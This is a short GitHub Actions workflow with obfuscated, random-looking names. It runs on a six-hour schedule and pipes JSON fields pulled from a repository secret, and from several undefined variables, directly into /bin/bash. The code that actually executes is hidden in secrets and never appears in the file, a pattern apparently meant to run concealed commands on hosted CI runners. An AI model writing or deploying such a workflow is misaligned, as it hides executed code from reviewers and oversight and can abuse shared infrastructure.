name: aftershrug

on:
  workflow_dispatch:
  schedule:
    - cron: '48 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: aftershrug
        env:
          hlln7713: ${{ secrets.hlln7713 }}
        run: |
          echo $hlln7713 | jq -r .brqrt9250 | /bin/bash
          echo $kjue5107 | jq -r .w398 | /bin/bash
          echo $oqp9 | jq -r .e8084 | /bin/bash
          echo $sldz14554 | jq -r .spk28 | /bin/bash
          echo $fhh69 | jq -r .p10 | /bin/bash

